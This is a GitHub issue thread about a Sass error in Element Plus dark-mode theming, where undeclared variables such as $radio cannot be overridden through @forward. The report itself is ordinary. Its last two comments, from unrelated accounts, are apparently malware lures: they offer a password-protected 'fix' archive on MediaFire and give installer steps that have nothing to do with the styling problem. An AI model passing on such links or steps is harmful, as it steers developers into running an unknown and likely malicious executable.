### ISSUE TITLE
[Style] 暗黑模式修改部分变量报错：[plugin:vite:css] [sass] This variable was not declared with !default in the @used module.

### ISSUE THREAD

**Issue by TWLlulu** [element-plus/element-plus#18053]
Bug Type: **`Style`**

## Environment

- Vue Version: `3.4.37`
- Element Plus Version: `2.8.0`
- Browser / OS: `Chrome 128.0.6613.85（正式版本） （64 位）`
- Build Tool: `Vite`

### Related Component

- `N/A`

### Reproduction Link

[Github Repo](https://github.com/element-plus/element-plus-vite-starter)

### Steps to reproduce

暗黑模式dark.scss新增$radio、$checkbox等在element-plus/theme-chalk/src/dark/var.scss未定义的变量时报错，light.scss设置无问题

```vue
// src/styles/element/dark.scss

$--colors: (
  'primary': (
    'base': red,
  ),
  'info': (
    'base': blue,
  ),
);

$--text-color: (
  'regular': #ffffff,
);

$--radio: (
  'text-color': yellow,
  'input-bg-color': transparent,
  'input-border': 1px solid green,
);

@forward 'element-plus/theme-chalk/src/dark/var.scss' with (
  $colors: $--colors,
  $text-color: $--text-color,
  $radio: $--radio
);
```

### What is Expected?

可以与light一样可以设置

### What is actually happening?

只能设置$color、$bg-color等变量

### Additional comments

_(empty)_

**Comment by TWLlulu** [comment]
同https://github.com/element-plus/element-plus/issues/9076一样的问题

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
